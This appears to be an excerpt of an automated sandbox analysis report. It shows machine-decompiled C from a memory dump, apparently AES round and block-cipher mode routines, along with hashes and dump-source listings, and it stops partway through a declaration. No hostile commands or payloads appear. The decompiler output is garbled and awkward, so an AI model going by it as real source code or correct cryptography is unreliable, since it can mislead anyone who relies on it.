                                                              • Instruction Fuzzy Hash: 6BD1DE71A087409FC358CF29C48091BFBE1BFC9710F95892EF59A87361E671E945CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 57%
                                                              			E00B9E380(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int* __edi) {
                                                              				unsigned int _t107;
                                                              				signed int _t120;
                                                              				signed char _t121;
                                                              				signed char _t135;
                                                              				signed int _t139;
                                                              				unsigned int _t148;
                                                              				signed int _t154;
                                                              				signed int* _t217;
                                                              				intOrPtr _t321;
                                                              				void* _t338;
                                                              
                                                              				 *(_t338 + 0x14) = __edi;
                                                              				_t107 = __eax ^  *__edi;
                                                              				_t120 = __ebx ^ __edi[1];
                                                              				_t135 = __ecx ^ __edi[2];
                                                              				_t148 = __edx ^ __edi[3];
                                                              				 *((intOrPtr*)(_t338 + 0x18)) = __edi + (__edi[0x3c] + __edi[0x3c] - 2) * 8;
                                                              				0;
                                                              				do {
                                                              					 *(_t338 + 4) =  *(_t321 + (_t107 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t120 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t135 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t148 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              					_t121 = _t120 >> 0x10;
                                                              					 *(_t338 + 8) =  *(_t321 + (_t120 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t135 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t148 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t107 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              					_t154 =  *(_t321 + (_t148 & 0xff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t107 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t121 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t135 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              					_t139 =  *(_t321 + (_t135 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t148 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t107 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t121 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000018;
                                                              					asm("ror ebp, 0x10");
                                                              					asm("ror edi, 0x18");
                                                              					asm("rol ecx, 0x18");
                                                              					asm("ror ebp, 0x10");
                                                              					asm("ror edi, 0x18");
                                                              					asm("rol edx, 0x18");
                                                              					asm("ror ebp, 0x10");
                                                              					asm("ror edi, 0x18");
                                                              					asm("rol eax, 0x18");
                                                              					asm("ror ebp, 0x10");
                                                              					asm("ror edi, 0x18");
                                                              					asm("rol ebx, 0x18");
                                                              					_t321 =  *((intOrPtr*)(_t338 + 0x1c));
                                                              					_t217 =  &(( *(_t338 + 0x14))[4]);
                                                              					_t107 =  *(_t338 + 4) ^ 0x80808080 ^ 0x80808080 - ((0x80808080 &  *(_t338 + 4)) >> 0x00000007) & 0x1b1b1b1b ^  *(_t338 + 4) +  *(_t338 + 4) & 0xfefefefe ^  *(_t338 + 4) ^  *(_t338 + 4) ^  *_t217;
                                                              					_t120 =  *(_t338 + 8) ^ 0x80808080 ^ 0x80808080 - ((0x80808080 &  *(_t338 + 8)) >> 0x00000007) & 0x1b1b1b1b ^  *(_t338 + 8) +  *(_t338 + 8) & 0xfefefefe ^  *(_t338 + 8) ^  *(_t338 + 8) ^ _t217[1];
                                                              					_t135 = _t139 ^ 0x80808080 ^ 0x80808080 - ((0x80808080 & _t139) >> 0x00000007) & 0x1b1b1b1b ^ _t139 + _t139 & 0xfefefefe ^ _t139 ^ _t139 ^ _t217[2];
                                                              					_t148 = _t154 ^ 0x80808080 ^ 0x80808080 - ((0x80808080 & _t154) >> 0x00000007) & 0x1b1b1b1b ^ _t154 + _t154 & 0xfefefefe ^ _t154 ^ _t154 ^ _t217[3];
                                                              					 *(_t338 + 0x14) = _t217;
                                                              				} while (_t217 <  *((intOrPtr*)(_t338 + 0x18)));
                                                              				 *(_t338 + 4) =  *(_t321 + (_t107 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t120 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t135 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t148 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              				 *(_t338 + 8) =  *(_t321 + (_t120 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t135 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t148 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t107 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              				return  *(_t338 + 4) ^ ( *(_t338 + 0x14))[4];
                                                              			}


                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b32b9f09d68a8ba3adc6463fbd9cf88116f9db414d22f8215cfaa78ec6d93ad
                                                              • Instruction ID: 2e44cd805bab52df98ba5988aa0316d476129c974bd8044687bc0cf43692a2f4
                                                              • Opcode Fuzzy Hash: 0b32b9f09d68a8ba3adc6463fbd9cf88116f9db414d22f8215cfaa78ec6d93ad
                                                              • Instruction Fuzzy Hash: 5191D473918BBE06D7605EAF88041B9F6E3AFC8210F9B0776DD9463642C970AE4696D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E00B9DBA0(void* __ebp, unsigned int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, char _a56, signed int _a72, intOrPtr* _a80, intOrPtr _a84, intOrPtr _a88, signed int _a92) {
                                                              				intOrPtr _v0;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t139;
                                                              				unsigned int _t143;
                                                              				void* _t149;
                                                              				signed int _t157;
                                                              				signed int* _t165;
                                                              				signed int* _t173;
                                                              				unsigned int _t177;
                                                              				void* _t178;
                                                              				signed int _t184;
                                                              				signed int _t187;
                                                              				signed int _t188;
                                                              				signed int _t200;
                                                              				signed int _t201;
                                                              				void* _t217;
                                                              				signed char _t229;
                                                              				unsigned int _t230;
                                                              				signed int _t248;
                                                              				signed int _t249;
                                                              				intOrPtr* _t250;
                                                              				unsigned int _t252;
                                                              				void* _t253;
                                                              				signed int _t254;
                                                              				void* _t256;
                                                              				signed int _t257;
                                                              
                                                              				E00C6BB10(0x4c);
                                                              				_t139 =  *0xcc5970; // 0x851ab4dd
                                                              				_a72 = _t139 ^ _t254;
                                                              				_a16 = _a88;
                                                              				_t187 = _a92;
                                                              				_t250 = _a80;
                                                              				_t252 =  *(_t250 + 0x54);
                                                              				_t184 = _t187 >> 4;
                                                              				_v0 = _a84;
                                                              				_t248 =  *(_t250 + 0x50);
                                                              				_t143 = _t184 + _t248;
                                                              				asm("adc edx, ebp");
                                                              				_a20 = _t184;
                                                              				_a4 = _t143;
                                                              				_a8 = 0;
                                                              				if(_t184 == 0) {
                                                              					L10:
                                                              					_t248 = _t248 + 1;
                                                              					asm("adc ebp, 0x0");
                                                              					__eflags = _t252 - _a8;
                                                              					if(__eflags > 0) {
                                                              						goto L22;
                                                              					} else {
                                                              						if(__eflags < 0) {
                                                              							L13:
                                                              							_t184 = 0;
                                                              							__eflags = _t248 & 0x00000001;
                                                              							_t201 = _t248;
                                                              							_t230 = _t252;
                                                              							_a12 = 0;
                                                              							if((_t248 & 0x00000001) == 0) {
                                                              								do {
                                                              									_a12 = _a12 + 1;
                                                              									_t201 = (_t230 << 0x00000020 | _t201) >> 1;
                                                              									_t184 = 0;
                                                              									_t230 = _t230 >> 1;
                                                              									__eflags = _t201 & 0x00000001;
                                                              								} while ((_t201 & 0x00000001) == 0);
                                                              							}
                                                              							_push(_a12);
                                                              							_push(_t250);
                                                              							_t157 = E00B9D530();
                                                              							_t257 = _t254 + 8;
                                                              							__eflags = _t157;
                                                              							if(_t157 == 0) {
                                                              								goto L8;
                                                              							} else {
                                                              								goto L17;
                                                              							}
                                                              						} else {
                                                              							__eflags = _t248 - _t143;
                                                              							if(_t248 > _t143) {
                                                              								goto L22;
                                                              							} else {
                                                              								goto L13;
                                                              								do {
                                                              									do {
                                                              										goto L13;
                                                              										L17:
                                                              										 *(_t250 + 0x88) =  *(_t250 + 0x88) ^  *_t157;
                                                              										 *(_t250 + 0x8c) =  *(_t250 + 0x8c) ^  *(_t157 + 4);
                                                              										 *(_t250 + 0x90) =  *(_t250 + 0x90) ^  *(_t157 + 8);
                                                              										 *(_t250 + 0x94) =  *(_t250 + 0x94) ^  *(_t157 + 0xc);
                                                              										_t165 = (_t248 -  *(_t250 + 0x50) - 1 << 4) + _v0;
                                                              										_a24 =  *(_t250 + 0x88) ^  *_t165;
                                                              										_a28 =  *(_t250 + 0x8c) ^ _t165[1];
                                                              										_a32 =  *(_t250 + 0x90) ^ _t165[2];
                                                              										_a36 =  *(_t250 + 0x94) ^ _t165[3];
                                                              										 *(_t250 + 0x98) =  *(_t250 + 0x98) ^  *_t165;
                                                              										 *(_t250 + 0x9c) =  *(_t250 + 0x9c) ^ _t165[1];
                                                              										 *(_t250 + 0xa0) =  *(_t250 + 0xa0) ^ _t165[2];
                                                              										 *(_t250 + 0xa4) =  *(_t250 + 0xa4) ^ _t165[3];
                                                              										 *((intOrPtr*)( *_t250))( &_a24,  &_a40,  *((intOrPtr*)(_t250 + 8)));
                                                              										_t254 = _t257 + 0xc;
                                                              										_t173 = (_t248 -  *(_t250 + 0x50) - 1 << 4) + _a16;
                                                              										 *_t173 =  *(_t250 + 0x88) ^ _a40;
                                                              										_t173[1] =  *(_t250 + 0x8c) ^ _a44;
                                                              										_t248 = _t248 + 1;
                                                              										asm("adc ebp, 0x0");
                                                              										_t173[2] =  *(_t250 + 0x90) ^ _a48;
                                                              										_t173[3] =  *(_t250 + 0x94) ^ _a52;
                                                              										__eflags = _t252 - _a8;
                                                              									} while (__eflags < 0);
                                                              									if(__eflags > 0) {
                                                              										break;
                                                              									} else {
                                                              										goto L19;
                                                              									}
                                                              									goto L28;
                                                              									L19:
                                                              									__eflags = _t248 - _a4;
                                                              								} while (_t248 <= _a4);
                                                              								_t184 = _a20;
                                                              								goto L21;
                                                              							}
                                                              						}
                                                              					}
                                                              				} else {
                                                              					_t230 = 0;
                                                              					if(_t143 != _t143 || _a8 != 0 ||  *((intOrPtr*)(_t250 + 0x10)) == 0) {
                                                              						goto L10;
                                                              					} else {
                                                              						_t217 = 0;
                                                              						_t177 = _t143 >> 1;
                                                              						while(_t177 != 0) {
                                                              							_t217 = _t217 + 1;
                                                              							_t177 = _t177 >> 1;
                                                              						}
                                                              						_push(_t217);
                                                              						_push(_t250);
                                                              						_t178 = E00B9D530();
                                                              						_t257 = _t254 + 8;
                                                              						if(_t178 != 0) {
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x10))))(_v0, _a16, _t184,  *((intOrPtr*)(_t250 + 8)),  *(_t250 + 0x50) + 1, _t250 + 0x88,  *((intOrPtr*)(_t250 + 0x40)), _t250 + 0x98);
                                                              							_t254 = _t257 + 0x20;
                                                              							L21:
                                                              							_t187 = _a92;
                                                              							_t143 = _a4;
                                                              							L22:
                                                              							_t188 = _t187 & 0x0000000f;
                                                              							__eflags = _t188;
                                                              							_t249 = _t188;
                                                              							if(_t188 > 0) {
                                                              								 *(_t250 + 0x88) =  *(_t250 + 0x88) ^  *(_t250 + 0x20);
                                                              								 *(_t250 + 0x8c) =  *(_t250 + 0x8c) ^  *(_t250 + 0x24);
                                                              								 *(_t250 + 0x90) =  *(_t250 + 0x90) ^  *(_t250 + 0x28);
                                                              								 *(_t250 + 0x94) =  *(_t250 + 0x94) ^  *(_t250 + 0x2c);
                                                              								 *((intOrPtr*)( *_t250))(_t250 + 0x88,  &_a56,  *((intOrPtr*)(_t250 + 8)));
                                                              								_t256 = _t254 + 0xc;
                                                              								_t149 = 0;
                                                              								__eflags = _t249;
                                                              								if(_t249 > 0) {
                                                              									_t253 = (_t184 << 4) + _v0;
                                                              									_t200 = (_t184 << 4) + _a16;
                                                              									__eflags = _t200;
                                                              									do {
                                                              										_t229 =  *(_t149 + _t253) ^  *(_t256 + _t149 + 0x48);
                                                              										_t149 = _t149 + 1;
                                                              										 *(_t200 + _t149 - 1) = _t229;
                                                              										__eflags = _t149 - _t249;
                                                              									} while (_t149 < _t249);
                                                              								}
                                                              								_t184 = (_t184 << 4) + _v0;
                                                              								_a24 = 0;
                                                              								_a28 = 0;
                                                              								_a32 = 0;
                                                              								_a36 = 0;
                                                              								E00C6B7A0(_t184, _t249, _t250,  &_a24, _t184, _t249);
                                                              								 *((char*)(_t256 + _t249 + 0x34)) = 0x80;
                                                              								 *(_t250 + 0x98) =  *(_t250 + 0x98) ^ _a24;
                                                              								 *(_t250 + 0xa0) =  *(_t250 + 0xa0) ^ _a32;
                                                              								 *(_t250 + 0x9c) =  *(_t250 + 0x9c) ^ _a28;
                                                              								_t143 = _a4;
                                                              								_t254 = _t256 + 0xc;
                                                              								_t131 = _t250 + 0xa4;
                                                              								 *_t131 =  *(_t250 + 0xa4) ^ _a36;
                                                              								__eflags =  *_t131;
                                                              							}
                                                              							 *(_t250 + 0x50) = _t143;
                                                              							 *(_t250 + 0x54) = _a8;
                                                              							__eflags = _a72 ^ _t254;
                                                              							return E00C69C26(1, _t184, _a72 ^ _t254, _a8, _t249, _t250);
                                                              						} else {
                                                              							L8:
                                                              							return E00C69C26(0, _t184, _a72 ^ _t257, _t230, _t248, _t250);
                                                              						}
                                                              					}
                                                              				}
                                                              				L28:
                                                              			}































                                                              0x00b9de53
                                                              0x00b9de57
                                                              0x00b9de61
                                                              0x00b9de66
                                                              0x00b9de6f
                                                              0x00b9de7d
                                                              0x00b9de87
                                                              0x00b9de8d
                                                              0x00b9de91
                                                              0x00b9de94
                                                              0x00b9de94
                                                              0x00b9de94
                                                              0x00b9de94
                                                              0x00b9dea3
                                                              0x00b9dea6
                                                              0x00b9deac
                                                              0x00b9debb
                                                              0x00b9dc26
                                                              0x00b9dc26
                                                              0x00b9dc37
                                                              0x00b9dc37
                                                              0x00b9dc21
                                                              0x00b9dbf8
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b4fba50c2795947481df4c6b988e62e7d3fe7bb3862334d1ef97043b04d5ccd
                                                              • Instruction ID: 3a4a263534f940a5f162bae33eea8bf6f21bc8db415d544526022651fccad647
                                                              • Opcode Fuzzy Hash: 0b4fba50c2795947481df4c6b988e62e7d3fe7bb3862334d1ef97043b04d5ccd
                                                              • Instruction Fuzzy Hash: 7BA10271608B019FD728CF29C881A6BF7F1FFC8304F45896DE59A87251DA70E945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 68%
                                                              			E00B9DEC0(void* __ebp, unsigned int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, char _a56, signed int _a72, intOrPtr* _a80, intOrPtr _a84, intOrPtr _a88, signed int _a92) {
                                                              				intOrPtr _v0;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t140;
                                                              				unsigned int _t144;
                                                              				void* _t150;
                                                              				signed int _t158;
                                                              				signed int* _t166;
                                                              				signed int* _t174;
                                                              				unsigned int _t178;
                                                              				void* _t179;
                                                              				signed int _t185;
                                                              				signed int _t188;
                                                              				signed int _t189;
                                                              				signed int _t201;
                                                              				signed int _t202;
                                                              				void* _t218;
                                                              				signed char _t230;
                                                              				unsigned int _t231;
                                                              				signed int _t249;
                                                              				signed int _t250;
                                                              				intOrPtr* _t251;
                                                              				unsigned int _t253;
                                                              				void* _t254;
                                                              				signed int _t255;
                                                              				void* _t257;
                                                              				signed int _t258;
                                                              
                                                              				E00C6BB10(0x4c);
                                                              				_t140 =  *0xcc5970; // 0x851ab4dd
                                                              				_a72 = _t140 ^ _t255;
                                                              				_v0 = _a88;
                                                              				_t188 = _a92;
                                                              				_t251 = _a80;
                                                              				_t253 =  *(_t251 + 0x54);
                                                              				_t185 = _t188 >> 4;
                                                              				_a16 = _a84;
                                                              				_t249 =  *(_t251 + 0x50);
                                                              				_t144 = _t185 + _t249;
                                                              				asm("adc edx, ebp");
                                                              				_a20 = _t185;
                                                              				_a4 = _t144;
                                                              				_a8 = 0;
                                                              				if(_t185 == 0) {
                                                              					L10:
                                                              					_t249 = _t249 + 1;
                                                              					asm("adc ebp, 0x0");
                                                              					__eflags = _t253 - _a8;
                                                              					if(__eflags > 0) {
                                                              						goto L22;
                                                              					} else {
                                                              						if(__eflags < 0) {
                                                              							L13:
                                                              							_t185 = 0;
                                                              							__eflags = _t249 & 0x00000001;
                                                              							_t202 = _t249;
                                                              							_t231 = _t253;
                                                              							_a12 = 0;
                                                              							if((_t249 & 0x00000001) == 0) {
                                                              								do {
                                                              									_a12 = _a12 + 1;
                                                              									_t202 = (_t231 << 0x00000020 | _t202) >> 1;
                                                              									_t185 = 0;
                                                              									_t231 = _t231 >> 1;
                                                              									__eflags = _t202 & 0x00000001;
                                                              								} while ((_t202 & 0x00000001) == 0);
                                                              							}
                                                              							_push(_a12);
                                                              							_push(_t251);
                                                              							_t158 = E00B9D530();
                                                              							_t258 = _t255 + 8;
                                                              							__eflags = _t158;
                                                              							if(_t158 == 0) {
                                                              								goto L8;
                                                              							} else {
                                                              								goto L17;
                                                              							}
                                                              						} else {
                                                              							__eflags = _t249 - _t144;
                                                              							if(_t249 > _t144) {
                                                              								goto L22;
                                                              							} else {
                                                              								goto L13;
                                                              								do {
                                                              									do {
                                                              										goto L13;
                                                              										L17:
                                                              										 *(_t251 + 0x88) =  *(_t251 + 0x88) ^  *_t158;
                                                              										 *(_t251 + 0x8c) =  *(_t251 + 0x8c) ^  *(_t158 + 4);
                                                              										 *(_t251 + 0x90) =  *(_t251 + 0x90) ^  *(_t158 + 8);
                                                              										 *(_t251 + 0x94) =  *(_t251 + 0x94) ^  *(_t158 + 0xc);
                                                              										_t166 = (_t249 -  *(_t251 + 0x50) - 1 << 4) + _a16;
                                                              										_a24 =  *(_t251 + 0x88) ^  *_t166;
                                                              										_a28 =  *(_t251 + 0x8c) ^ _t166[1];
                                                              										_a32 = _t166[2] ^  *(_t251 + 0x90);
                                                              										_a36 = _t166[3] ^  *(_t251 + 0x94);
                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t251 + 4))))( &_a24,  &_a40,  *((intOrPtr*)(_t251 + 0xc)));
                                                              										_t255 = _t258 + 0xc;
                                                              										_t174 = (_t249 -  *(_t251 + 0x50) - 1 << 4) + _v0;
                                                              										 *_t174 =  *(_t251 + 0x88) ^ _a40;
                                                              										_t174[1] =  *(_t251 + 0x8c) ^ _a44;
                                                              										_t174[2] =  *(_t251 + 0x90) ^ _a48;
                                                              										_t174[3] =  *(_t251 + 0x94) ^ _a52;
                                                              										 *(_t251 + 0x98) =  *(_t251 + 0x98) ^  *_t174;
                                                              										 *(_t251 + 0x9c) =  *(_t251 + 0x9c) ^ _t174[1];
                                                              										 *(_t251 + 0xa0) =  *(_t251 + 0xa0) ^ _t174[2];
                                                              										 *(_t251 + 0xa4) =  *(_t251 + 0xa4) ^ _t174[3];
                                                              										_t249 = _t249 + 1;
                                                              										asm("adc ebp, 0x0");
                                                              										__eflags = _t253 - _a8;
                                                              									} while (__eflags < 0);
                                                              									if(__eflags > 0) {
                                                              										break;
                                                              									} else {
                                                              										goto L19;
                                                              									}
                                                              									goto L28;
                                                              									L19:
                                                              									__eflags = _t249 - _a4;
                                                              								} while (_t249 <= _a4);
                                                              								_t185 = _a20;
                                                              								goto L21;
                                                              							}
                                                              						}
                                                              					}
                                                              				} else {
                                                              					_t231 = 0;
                                                              					if(_t144 != _t144 || _a8 != 0 ||  *((intOrPtr*)(_t251 + 0x10)) == 0) {
                                                              						goto L10;
                                                              					} else {
                                                              						_t218 = 0;
                                                              						_t178 = _t144 >> 1;
                                                              						while(_t178 != 0) {
                                                              							_t218 = _t218 + 1;
                                                              							_t178 = _t178 >> 1;
                                                              						}
                                                              						_push(_t218);
                                                              						_push(_t251);
                                                              						_t179 = E00B9D530();
                                                              						_t258 = _t255 + 8;
                                                              						if(_t179 != 0) {
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x10))))(_a16, _v0, _t185,  *((intOrPtr*)(_t251 + 0xc)),  *(_t251 + 0x50) + 1, _t251 + 0x88,  *((intOrPtr*)(_t251 + 0x40)), _t251 + 0x98);
                                                              							_t255 = _t258 + 0x20;
                                                              							L21:
                                                              							_t188 = _a92;
                                                              							_t144 = _a4;
                                                              							L22:
                                                              							_t189 = _t188 & 0x0000000f;
                                                              							__eflags = _t189;
                                                              							_t250 = _t189;
                                                              							if(_t189 > 0) {
                                                              								 *(_t251 + 0x88) =  *(_t251 + 0x88) ^  *(_t251 + 0x20);
                                                              								 *(_t251 + 0x8c) =  *(_t251 + 0x8c) ^  *(_t251 + 0x24);
                                                              								 *(_t251 + 0x90) =  *(_t251 + 0x90) ^  *(_t251 + 0x28);
                                                              								 *(_t251 + 0x94) =  *(_t251 + 0x94) ^  *(_t251 + 0x2c);
                                                              								 *((intOrPtr*)( *_t251))(_t251 + 0x88,  &_a56,  *((intOrPtr*)(_t251 + 8)));
                                                              								_t257 = _t255 + 0xc;
                                                              								_t150 = 0;
                                                              								__eflags = _t250;
                                                              								if(_t250 > 0) {
                                                              									_t254 = (_t185 << 4) + _a16;
                                                              									_t201 = (_t185 << 4) + _v0;
                                                              									__eflags = _t201;
                                                              									do {
                                                              										_t230 =  *(_t150 + _t254) ^  *(_t257 + _t150 + 0x48);
                                                              										_t150 = _t150 + 1;
                                                              										 *(_t201 + _t150 - 1) = _t230;
                                                              										__eflags = _t150 - _t250;
                                                              									} while (_t150 < _t250);
                                                              								}
                                                              								_t185 = (_t185 << 4) + _v0;
                                                              								_a24 = 0;
                                                              								_a28 = 0;
                                                              								_a32 = 0;
                                                              								_a36 = 0;
                                                              								E00C6B7A0(_t185, _t250, _t251,  &_a24, _t185, _t250);
                                                              								 *((char*)(_t257 + _t250 + 0x34)) = 0x80;
                                                              								 *(_t251 + 0x98) =  *(_t251 + 0x98) ^ _a24;
                                                              								 *(_t251 + 0xa0) =  *(_t251 + 0xa0) ^ _a32;
                                                              								 *(_t251 + 0x9c) =  *(_t251 + 0x9c) ^ _a28;
                                                              								_t144 = _a4;
                                                              								_t255 = _t257 + 0xc;
                                                              								_t132 = _t251 + 0xa4;
                                                              								 *_t132 =  *(_t251 + 0xa4) ^ _a36;
                                                              								__eflags =  *_t132;
                                                              							}
                                                              							 *(_t251 + 0x50) = _t144;
                                                              							 *(_t251 + 0x54) = _a8;
                                                              							__eflags = _a72 ^ _t255;
                                                              							return E00C69C26(1, _t185, _a72 ^ _t255, _a8, _t250, _t251);
                                                              						} else {
                                                              							L8:
                                                              							return E00C69C26(0, _t185, _a72 ^ _t258, _t231, _t249, _t251);
                                                              						}
                                                              					}
                                                              				}
                                                              				L28:
                                                              			}































                                                              0x00b9e0ef
                                                              0x00b9e0f2
                                                              0x00b9e0f4
                                                              0x00b9e0fd
                                                              0x00b9e106
                                                              0x00b9e112
                                                              0x00b9e11b
                                                              0x00b9e130
                                                              0x00b9e132
                                                              0x00b9e135
                                                              0x00b9e137
                                                              0x00b9e139
                                                              0x00b9e144
                                                              0x00b9e150
                                                              0x00b9e150
                                                              0x00b9e152
                                                              0x00b9e155
                                                              0x00b9e159
                                                              0x00b9e15a
                                                              0x00b9e15e
                                                              0x00b9e15e
                                                              0x00b9e152
                                                              0x00b9e167
                                                              0x00b9e16c
                                                              0x00b9e170
                                                              0x00b9e174
                                                              0x00b9e178
                                                              0x00b9e182
                                                              0x00b9e187
                                                              0x00b9e190
                                                              0x00b9e19e
                                                              0x00b9e1a8
                                                              0x00b9e1ae
                                                              0x00b9e1b2
                                                              0x00b9e1b5
                                                              0x00b9e1b5
                                                              0x00b9e1b5
                                                              0x00b9e1b5
                                                              0x00b9e1c4
                                                              0x00b9e1c7
                                                              0x00b9e1cd
                                                              0x00b9e1dc
                                                              0x00b9df46
                                                              0x00b9df46
                                                              0x00b9df57
                                                              0x00b9df57
                                                              0x00b9df41
                                                              0x00b9df18
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ebe2d39274021ad671eef741b2309ad1515d359f7d9660b227653b656759aa2a
                                                              • Instruction ID: 9586c1ca2c61331058c6be66810d8835e897ce6a254dabd28f8a52b3103b23d2
                                                              • Opcode Fuzzy Hash: ebe2d39274021ad671eef741b2309ad1515d359f7d9660b227653b656759aa2a
                                                              • Instruction Fuzzy Hash: F8A1F4716087008FD768CF29C881A6BF7E5FFC8314F45896EE5AA87351DA30E945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00B9B940(signed int* __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a44, signed int _a48, signed int _a52, signed int _a60, intOrPtr* _a68) {
                                                              				signed int _v0;
                                                              				intOrPtr* _t178;
                                                              				unsigned int _t179;
                                                              				signed int _t182;
                                                              				signed int _t186;
                                                              				signed int _t187;
                                                              				signed int _t208;
                                                              				signed int _t210;
                                                              				unsigned int _t212;
                                                              				signed int _t218;
                                                              				signed int _t219;
                                                              				signed int _t221;
                                                              				signed int _t222;
                                                              				signed int _t224;
                                                              				signed int _t231;
                                                              				unsigned int _t234;
                                                              				signed int _t237;
                                                              				signed int _t238;
                                                              				signed int _t241;
                                                              				signed int _t245;
                                                              				signed int _t246;
                                                              				signed int _t250;
                                                              				signed int _t253;
                                                              				signed int _t261;
                                                              				signed int _t263;
                                                              				unsigned int _t267;
